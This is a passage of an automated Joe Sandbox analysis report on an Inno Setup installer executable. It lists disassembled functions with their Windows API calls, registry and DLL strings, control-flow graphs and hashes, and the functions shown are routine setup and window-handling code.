                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FindSleepWindow
                                                                                                      • String ID: CALLDLLPROC$CHARTOOEMBUFF$CREATEMUTEX$FINDWINDOWBYCLASSNAME$FINDWINDOWBYWINDOWNAME$FREEDLL$LOADDLL$OEMTOCHARBUFF$POSTBROADCASTMESSAGE$POSTMESSAGE$REGISTERWINDOWMESSAGE$SENDBROADCASTMESSAGE$SENDBROADCASTNOTIFYMESSAGE$SENDMESSAGE$SENDNOTIFYMESSAGE$SLEEP
                                                                                                      • API String ID: 3078808852-3310373309
                                                                                                      • Opcode ID: 04389725d469abda592edc5d686fc9dc2997d938da4e0f8a72bd6865d44b9f5f
                                                                                                      • Instruction ID: d4b9d66e752ac066ee841e8e0b6dcdad2790022369f15f3c2d7e05b7c0e56f01
                                                                                                      • Opcode Fuzzy Hash: 04389725d469abda592edc5d686fc9dc2997d938da4e0f8a72bd6865d44b9f5f
                                                                                                      • Instruction Fuzzy Hash: 7BC18360B042003BDB14BE3E8D4651F599AAF98704B21DA3FB446EB78BDE7DDC0A4359
                                                                                                      Function 004834FC Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 68libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1589 4834fc-483521 GetModuleHandleA GetProcAddress 1590 483588-48358d GetSystemInfo 1589->1590 1591 483523-483539 GetNativeSystemInfo GetProcAddress 1589->1591 1592 483592-48359b 1590->1592 1591->1592 1593 48353b-483546 GetCurrentProcess 1591->1593 1594 4835ab-4835b2 1592->1594 1595 48359d-4835a1 1592->1595 1593->1592 1602 483548-48354c 1593->1602 1598 4835cd-4835d2 1594->1598 1596 4835a3-4835a7 1595->1596 1597 4835b4-4835bb 1595->1597 1600 4835a9-4835c6 1596->1600 1601 4835bd-4835c4 1596->1601 1597->1598 1600->1598 1601->1598 1602->1592 1604 48354e-483555 call 452708 1602->1604 1604->1592 1607 483557-483564 GetProcAddress 1604->1607 1607->1592 1608 483566-48357d GetModuleHandleA GetProcAddress 1607->1608 1608->1592 1609 48357f-483586 1608->1609 1609->1592
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0048350D
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0048351A
                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 00483528
                                                                                                      • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00483530
                                                                                                      • GetCurrentProcess.KERNEL32(?,00000000,IsWow64Process), ref: 0048353C
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryA), ref: 0048355D
                                                                                                      • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,00000000,GetSystemWow64DirectoryA,?,00000000,IsWow64Process), ref: 00483570
                                                                                                      • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 00483576
                                                                                                      • GetSystemInfo.KERNEL32(?,00000000,GetNativeSystemInfo,kernel32.dll), ref: 0048358D
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleInfoModuleSystem$CurrentNativeProcess
                                                                                                      • String ID: GetNativeSystemInfo$GetSystemWow64DirectoryA$IsWow64Process$RegDeleteKeyExA$advapi32.dll$kernel32.dll
                                                                                                      • API String ID: 2230631259-2623177817
                                                                                                      • Opcode ID: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                                                                      • Instruction ID: aef9cc714e700b71c16e3c25fef244724f393c0ebf8792b51c17ae6c670cb8ad
                                                                                                      • Opcode Fuzzy Hash: 902794c9b05e674b3c8cbfb7d2ebb6c35b92e2ba612f62c852d4d82e66413226
                                                                                                      • Instruction Fuzzy Hash: 3C11B181104341B4DA22BB799C4AB7FA5C88B14F1EF084C3B6C41662C2DBBCCF45972E
                                                                                                      Function 004690F4 Relevance: 24.7, APIs: 1, Strings: 13, Instructions: 155registryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1615 4690f4-46912c call 47bfd8 1618 469132-469142 call 478d40 1615->1618 1619 46930e-469328 call 403420 1615->1619 1624 469147-46918c call 4078fc call 403738 call 42de2c 1618->1624 1630 469191-469193 1624->1630 1631 469304-469308 1630->1631 1632 469199-4691ae 1630->1632 1631->1619 1631->1624 1633 4691c3-4691ca 1632->1633 1634 4691b0-4691be call 42dd5c 1632->1634 1636 4691f7-4691fe 1633->1636 1637 4691cc-4691ee call 42dd5c call 42dd74 1633->1637 1634->1633 1639 469257-46925e 1636->1639 1640 469200-469225 call 42dd5c * 2 1636->1640 1637->1636 1655 4691f0 1637->1655 1642 4692a4-4692ab 1639->1642 1643 469260-469272 call 42dd5c 1639->1643 1662 469227-469230 call 431508 1640->1662 1663 469235-469247 call 42dd5c 1640->1663 1645 4692e6-4692fc RegCloseKey 1642->1645 1646 4692ad-4692e1 call 42dd5c * 3 1642->1646 1656 469274-46927d call 431508 1643->1656 1657 469282-469294 call 42dd5c 1643->1657 1646->1645 1655->1636 1656->1657 1657->1642 1670 469296-46929f call 431508 1657->1670 1662->1663 1663->1639 1672 469249-469252 call 431508 1663->1672 1670->1642 1672->1639
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042DE2C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,c6H,?,00000001,?,?,00483663,?,00000001,00000000), ref: 0042DE48
                                                                                                      • RegCloseKey.ADVAPI32(?,0046930E,?,?,00000001,00000000,00000000,00469329,?,00000000,00000000,?), ref: 004692F7
                                                                                                      Strings
                                                                                                      • Inno Setup: User Info: Organization, xrefs: 004692C6
                                                                                                      • Inno Setup: User Info: Serial, xrefs: 004692D9
                                                                                                      • Inno Setup: Selected Tasks, xrefs: 00469263
                                                                                                      • Inno Setup: Deselected Tasks, xrefs: 00469285
                                                                                                      • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 00469153
                                                                                                      • Inno Setup: No Icons, xrefs: 004691DF
                                                                                                      • Inno Setup: App Path, xrefs: 004691B6
                                                                                                      • Inno Setup: Icon Group, xrefs: 004691D2
                                                                                                      • Inno Setup: User Info: Name, xrefs: 004692B3
                                                                                                      • Inno Setup: Setup Type, xrefs: 00469206
                                                                                                      • Inno Setup: Deselected Components, xrefs: 00469238
                                                                                                      • %s\%s_is1, xrefs: 00469171
                                                                                                      • Inno Setup: Selected Components, xrefs: 00469216
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpen
                                                                                                      • String ID: %s\%s_is1$Inno Setup: App Path$Inno Setup: Deselected Components$Inno Setup: Deselected Tasks$Inno Setup: Icon Group$Inno Setup: No Icons$Inno Setup: Selected Components$Inno Setup: Selected Tasks$Inno Setup: Setup Type$Inno Setup: User Info: Name$Inno Setup: User Info: Organization$Inno Setup: User Info: Serial$Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                                      • API String ID: 47109696-1093091907
                                                                                                      • Opcode ID: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                                                                      • Instruction ID: 061cd232f3236ea8aa9d1be5d6e88d15b117e94232a8cb9589ebe07a9024ca8b
                                                                                                      • Opcode Fuzzy Hash: 25db79955295e6fcdf5aa6e288321b734c42c3c57179da3fb439077398282def
                                                                                                      • Instruction Fuzzy Hash: 2451A530A007049BCB11DB65D991BDEB7F9EF49304F5084BAE841A7391E778AE05CB59
                                                                                                      Function 0047CB30 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 95libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1944 47cb30-47cb86 call 42c40c call 4035c0 call 47c7a8 call 4525c4 1953 47cb92-47cba1 call 4525c4 1944->1953 1954 47cb88-47cb8d call 453330 1944->1954 1958 47cba3-47cba9 1953->1958 1959 47cbbb-47cbc1 1953->1959 1954->1953 1960 47cbcb-47cbd3 call 403494 1958->1960 1961 47cbab-47cbb1 1958->1961 1962 47cbc3-47cbc9 1959->1962 1963 47cbd8-47cc00 call 42e3a4 * 2 1959->1963 1960->1963 1961->1959 1964 47cbb3-47cbb9 1961->1964 1962->1960 1962->1963 1970 47cc27-47cc41 GetProcAddress 1963->1970 1971 47cc02-47cc22 call 4078fc call 453330 1963->1971 1964->1959 1964->1960 1973 47cc43-47cc48 call 453330 1970->1973 1974 47cc4d-47cc6a call 403400 * 2 1970->1974 1971->1970 1973->1974
                                                                                                      APIs
                                                                                                      • GetProcAddress.KERNEL32(74600000,SHGetFolderPathA), ref: 0047CC32
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc
                                                                                                      • String ID: -rI$Failed to get address of SHGetFolderPath function$Failed to get version numbers of _shfoldr.dll$Failed to load DLL "%s"$SHFOLDERDLL$SHGetFolderPathA$_isetup\_shfoldr.dll$shell32.dll$shfolder.dll
                                                                                                      • API String ID: 190572456-1821436788
                                                                                                      • Opcode ID: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                                                                      • Instruction ID: 6634b889f1a60bd4549a24dd6789ad2f54a0d6468ac2a8038bb9781f42ef23c6
                                                                                                      • Opcode Fuzzy Hash: 6ffe9b8d239fe87f34ca3bad4a2ef70314c6aab1a19caa776437c1588b9a665e
                                                                                                      • Instruction Fuzzy Hash: 8531E970A00109DFCF11EFA9D9D29EEB7B5EB44304B60847BE808E7241D738AE458B6D
                                                                                                      Function 00406334 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 27libraryloaderCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 1982 406334-40634e GetModuleHandleA GetProcAddress 1983 406350 1982->1983 1984 406357-406364 GetProcAddress 1982->1984 1983->1984 1985 406366 1984->1985 1986 40636d-40637a GetProcAddress 1984->1986 1985->1986 1987 406380-406381 1986->1987 1988 40637c-40637e SetProcessDEPPolicy 1986->1988 1988->1987
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,00498590), ref: 0040633A
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00406347
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 0040635D
                                                                                                      • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00406373
                                                                                                      • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498590), ref: 0040637E
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModulePolicyProcess
                                                                                                      • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                                                      • API String ID: 3256987805-3653653586
                                                                                                      • Opcode ID: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
                                                                                                      • Instruction ID: d0a9e1fb4642b92a4408cab99680119fc9d423cfedcded744397bec81fc197df
                                                                                                      • Opcode Fuzzy Hash: 44a467ebc0bbd25a117d5635929f8822d44e7a6198a0967341d1dbca25e1581a
                                                                                                      • Instruction Fuzzy Hash: C6E026A1380701ACEA1436F20D82F7B10488B40B64B2A14373D5AB91C3D9BDD92459BD
                                                                                                      Function 00423884 Relevance: 15.1, APIs: 10, Instructions: 98windowregistryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2618 423884-42388e 2619 4239b7-4239bb 2618->2619 2620 423894-4238b6 call 41f3d4 GetClassInfoA 2618->2620 2623 4238e7-4238f0 GetSystemMetrics 2620->2623 2624 4238b8-4238cf RegisterClassA 2620->2624 2626 4238f2 2623->2626 2627 4238f5-4238ff GetSystemMetrics 2623->2627 2624->2623 2625 4238d1-4238e2 call 408cc4 call 40311c 2624->2625 2625->2623 2626->2627 2628 423901 2627->2628 2629 423904-423960 call 403738 call 406300 call 403400 call 42365c SetWindowLongA 2627->2629 2628->2629 2641 423962-423975 call 424188 SendMessageA 2629->2641 2642 42397a-4239a8 GetSystemMenu DeleteMenu * 2 2629->2642 2641->2642 2642->2619 2644 4239aa-4239b2 DeleteMenu 2642->2644 2644->2619
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041F3D4: VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                                                      • GetClassInfoA.USER32(00400000,0042368C), ref: 004238AF
                                                                                                      • RegisterClassA.USER32(00499630), ref: 004238C7
                                                                                                      • GetSystemMetrics.USER32(00000000), ref: 004238E9
                                                                                                      • GetSystemMetrics.USER32(00000001), ref: 004238F8
                                                                                                      • SetWindowLongA.USER32(00410660,000000FC,0042369C), ref: 00423954
                                                                                                      • SendMessageA.USER32(00410660,00000080,00000001,00000000), ref: 00423975
                                                                                                      • GetSystemMenu.USER32(00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 00423980
                                                                                                      • DeleteMenu.USER32(00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C,0041EDB4), ref: 0042398F
                                                                                                      • DeleteMenu.USER32(00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001), ref: 0042399C
                                                                                                      • DeleteMenu.USER32(00000000,0000F010,00000000,00000000,0000F000,00000000,00000000,0000F030,00000000,00410660,00000000,00000000,00400000,00000000,00000000,00000000), ref: 004239B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Menu$DeleteSystem$ClassMetrics$AllocInfoLongMessageRegisterSendVirtualWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 183575631-0
                                                                                                      • Opcode ID: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
                                                                                                      • Instruction ID: c8b20579a229f032ee7a03b4d787949f367ffe63dd75f0d430c9c3a529dbdbac
                                                                                                      • Opcode Fuzzy Hash: f8f7b9d3de02a5f634ff8a39374b78efb95d56f414cac3a76e6abeb800e2fe0e
                                                                                                      • Instruction Fuzzy Hash: 813172B17402006AEB10AF65AC82F6B36989B14308F10017BFA40AE2D3C6BDDD40876D
                                                                                                      Function 004674EC Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 141windowCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2646 4674ec-467596 call 41462c call 41464c call 41462c call 41464c SHGetFileInfo 2655 4675cb-4675d6 call 478d20 2646->2655 2656 467598-46759f 2646->2656 2661 467627-46763a call 47cff4 2655->2661 2662 4675d8-46761d call 42c40c call 40357c call 403738 ExtractIconA call 46742c 2655->2662 2656->2655 2658 4675a1-4675c6 ExtractIconA call 46742c 2656->2658 2658->2655 2668 46763c-467646 call 47cff4 2661->2668 2669 46764b-46764f 2661->2669 2684 467622 2662->2684 2668->2669 2671 467651-467674 call 403738 SHGetFileInfo 2669->2671 2672 4676a9-4676dd call 403400 * 2 2669->2672 2671->2672 2680 467676-46767d 2671->2680 2680->2672 2683 46767f-4676a4 ExtractIconA call 46742c 2680->2683 2683->2672 2684->2672
                                                                                                      APIs
                                                                                                      • SHGetFileInfo.SHELL32(c:\directory,00000010,?,00000160,00001010), ref: 0046758F
                                                                                                      • ExtractIconA.SHELL32(00400000,00000000,?), ref: 004675B5
                                                                                                        • Part of subcall function 0046742C: DrawIconEx.USER32(00000000,00000000,00000000,00000000,00000020,00000020,00000000,00000000,00000003), ref: 004674C4
                                                                                                        • Part of subcall function 0046742C: DestroyCursor.USER32(00000000), ref: 004674DA
                                                                                                      • ExtractIconA.SHELL32(00400000,00000000,00000027), ref: 0046760C
                                                                                                      • SHGetFileInfo.SHELL32(00000000,00000000,?,00000160,00001000), ref: 0046766D
                                                                                                      • ExtractIconA.SHELL32(00400000,00000000,?), ref: 00467693
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Icon$Extract$FileInfo$CursorDestroyDraw
                                                                                                      • String ID: c:\directory$k H$shell32.dll
                                                                                                      • API String ID: 3376378930-433663191
                                                                                                      • Opcode ID: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
                                                                                                      • Instruction ID: 265839c963417482dd86c951db209f81288bb0a388fd09f062db7983cc26d63d
                                                                                                      • Opcode Fuzzy Hash: 29e72a9552dfdc2cbc6caa590d21046d5f8b548d470bab6826c497dca36ee432
                                                                                                      • Instruction Fuzzy Hash: B2516070604604AFDB10EF69CD89FDFB7E8EB48318F1081A6F9049B391D6399E81CA59
                                                                                                      Function 0042F570 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 90windowregistryCOMMON
                                                                                                      Download Yara Rule

                                                                                                      Control-flow Graph

                                                                                                      • Executed
                                                                                                      • Not Executed
                                                                                                      control_flow_graph 2688 42f570-42f57a 2689 42f584-42f5c1 call 402b30 GetActiveWindow GetFocus call 41eeb4 2688->2689 2690 42f57c-42f57f call 402d30 2688->2690 2696 42f5d3-42f5db 2689->2696 2697 42f5c3-42f5cd RegisterClassA 2689->2697 2690->2689 2698 42f662-42f67e SetFocus call 403400 2696->2698 2699 42f5e1-42f612 CreateWindowExA 2696->2699 2697->2696 2699->2698 2701 42f614-42f658 call 42428c call 403738 CreateWindowExA 2699->2701 2701->2698 2707 42f65a-42f65d ShowWindow 2701->2707 2707->2698
                                                                                                      APIs
                                                                                                      • GetActiveWindow.USER32 ref: 0042F59F
                                                                                                      • GetFocus.USER32 ref: 0042F5A7
                                                                                                      • RegisterClassA.USER32(004997AC), ref: 0042F5C8
                                                                                                      • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,0042F69C,88000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0042F606
                                                                                                      • CreateWindowExA.USER32(00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000), ref: 0042F64C
                                                                                                      • ShowWindow.USER32(00000000,00000008,00000000,TWindowDisabler-Window,00000000,80000000,00000000,00000000,00000000,00000000,61736944,00000000,00400000,00000000,00000000,TWindowDisabler-Window), ref: 0042F65D
                                                                                                      • SetFocus.USER32(00000000,00000000,0042F67F,?,?,?,00000001,00000000,?,00458696,00000000,0049B628), ref: 0042F664
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CreateFocus$ActiveClassRegisterShow
                                                                                                      • String ID: TWindowDisabler-Window
                                                                                                      • API String ID: 3167913817-1824977358
                                                                                                      • Opcode ID: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
                                                                                                      • Instruction ID: 092f1afd63313efa57bcf667ad1f00c9caddf595d34af2871f870ebe591ae418
                                                                                                      • Opcode Fuzzy Hash: b2433ce4ffe1b1f942b14f487daced2f86516ced4add7bc415a00a8a37101852
                                                                                                      • Instruction Fuzzy Hash: 20219F70740710BAE710EF62AD03F1A76A8EB04B04FA1413AF504AB2D1D7B96D5586ED
                                                                                                      Function 004531DC Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 46libraryloaderCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 004531FC
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453202
                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453275,?,?,?,?,00000000,?,004985D6), ref: 00453216
                                                                                                      • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0045321C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287643441.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287665992.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287686805.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                      • Associated: 00000001.00000002.3287714931.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_1_2_400000_L9rm7AX4mp.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                      • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                      • API String ID: 1646373207-2130885113
                                                                                                      • Opcode ID: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
                                                                                                      • Instruction ID: 5e931287d6eebe3694b70f0ad3549e6df422da746536320e83a51589c54bb73f
                                                                                                      • Opcode Fuzzy Hash: c24ac2f37dcd2c5f05e81832aa1b687e7eaf3d26bd242744e205e68ddaa02280
                                                                                                      • Instruction Fuzzy Hash: 5B017570240B45AFD711AF73AD02F167658E705B57F6044BBFC0096286D77C8A088EAD
                                                                                                      Function 0047C800 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 108COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C893
                                                                                                      • GetLastError.KERNEL32(00000000,00000000,00000000,0047C973,?,?,00000000,0049B628,00000000,00000000,?,00497F09,00000000,004980B2,?,00000000), ref: 0047C89C
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000001.00000002.3287555822.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000001.00000002.3287524479.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
